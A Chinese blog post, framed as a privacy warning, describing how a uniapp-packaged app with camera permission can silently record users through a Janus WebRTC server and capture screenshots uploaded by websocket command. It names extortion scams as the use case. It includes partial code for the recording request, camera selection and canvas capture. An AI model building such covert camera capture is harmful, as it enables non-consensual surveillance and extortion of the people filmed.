场景
h5中接入了webrtc作为app端和web端视频通话的基础服务,使用uniapp将h5打包成apk之后,获取手机的摄像头权限,拿到权限后可以直接通过web端建立和手机端的视频通话,甚至
不需要用户同意就可以直接拿到用户app中的摄像头的媒体流,同时不断的截图将图片发送到后台保存,当然这只是轻量级的,如果使用到webrtc服务器[1]的话可以直接录制视频,将视频保存至服务器。ok,如果你不会webrtc没关系,毕竟拿到摄像头截个图保存到服务器不需要多复杂的东西,我写这个文章只是为了让你学习下webrtc和了解下摄像头的权限不要轻易给予不信任的app。
前言
1.必须确保app端登录的用户注册到webrtc服务器中,或者注册到自己写的后台即时通讯服务中,如websocket服务连接已经建立,当然你既然能安装apk和授予apk摄像头的权限,那么其他的事情就变的简单了,比如我如何让你和服务端建立视频连接,如何去截图你的视频画面,如何去实时保存你的视频画面。
2.如果你还不会webrtc,也没关系,前面说过了,单纯的的拿到的摄像头再截图再发送到服务器不需要这玩意也可以,但是有了这玩意录制视频将变得简单无感。
3.我只将部分伪代码发在文章了,注重讲解下逻辑。
举例
视频录制举例
上述条件都准备好了,具体的执行逻辑如下
当你打开apk并授予摄像头权限之后,我就可以在后台看到你的在线信息(webrtc服务器中有记录,我的后台也有记录),因此下一步就是我决定要不要发起和app端的你建立视频通话的连接了
当我决定和你建立视频通话连接的时候,这个时候有两种场景
1. 我假装需要你同意,在你同意之后我建立webrtc的连接
2. 直接建立webrtc连接,无需app端同意。实际上在某些场景中,比如勒索或者裸聊中我是可以直接在你授权后建立连接的,赤裸裸的现实中的例子
建立webrtc的连接之后,就是获取双方的媒体流,当然这是在正常公平的情况下,在
不正当的勒索平台中,我可不会将我的视频信息发送给受害者,因此这个时候我只会获取app端的你的摄像头的媒体流。这个流程不清楚的朋友可以去看看我之前写的webrtc系列的文章[2],下面是建立webrtc通信后我会发送一个录制请求,这个时候,你的摄像头的媒体流就会被保存在我这边的webrtc服务器中,但是你是无感的(下面的filename就是保存的文件及其路径)。
recordMedia(){
let set = {
"request" : "set",
"audio" : true,
"video" : true,
// "bitrate" :this.$store.state.videoCall.getBitrate(),
"record" : true,
"filename" : '/home/janus-gateway/record/'+this.loginInfo.username,
}
this.$store.state.videoCall.send({ message: set});
//关闭本地画面
// this.$store.state.videoCall.send({ message: { request: "set", video: false }});
},
远程截图
啊这个就更简单了,不需要webrtc就可以,当然需要webrtc也可以,直接用websocket即可
app授权打开后,app初始化直接注册socket到后台,我远程发送socket指令就可以
首先或者摄像头的媒体流(前置或者后置摄像头的流,更改下面的facingMode就可以,勒索过程中一般都是获取前置摄像头的)
mediaStreamConstaints: {
audio: true,
video: { width: {exact: 1280}, height: {exact: 720},facingMode: { exact: "environment" } },
/**
* 修改默认摄像头
* video:{ 'facingMode': "user" } 调用前置摄像头
* video: { facingMode: { exact: "environment" } } 后置
*/
},
获取成功后,继续发送websocket指令,截图
首先利用cavans或者app本地媒体流的video瞬间,然后转file类型,最后为所欲为不是吗?警告:
网络不是非法之地
dataURLtoFile(dataurl) {
let name = "xxxxx.jpeg"
var arr = dataurl.split(',')
if(!arr[1]){
return ;
}
var mime = arr[0].match(/:(.*?);/)[1]
var bstr = atob(arr[1])
var n = bstr.length
var u8arr = new Uint8Array(n);
while(n--){
u8arr[n] = bstr.charCodeAt(n);
}
return new File([u8arr], name, {type:mime});
},
uploadImg(){
const canvas = document.createElement("canvas");
const video = document.querySelector("#local");
canvas.width = video.videoWidth;
canvas.height = video.videoHeight;
canvas.getContext("2d").drawImage(video, 0, 0);
var mediumQuality = canvas.toDataURL("image/jpeg", 0.9);
let file = this.dataURLtoFile(mediumQuality)
//拿到file之后,上传远程服务器即可
console.log(file)
},
谨言慎行
上面的两个简单例子,在拿到你的摄像头权限后,简简单单就把你的隐私发送的服务器了,你还敢给不信任的app授予摄像头权限嘛?你还敢裸聊嘛?网络不是非法之地,但是很多毒瘤app就是通过无止境的贪婪,将你的个人信息收集到他们的后台,然后贩卖你的信息,遇到不信任的app请一定记得
授权等于送钱。
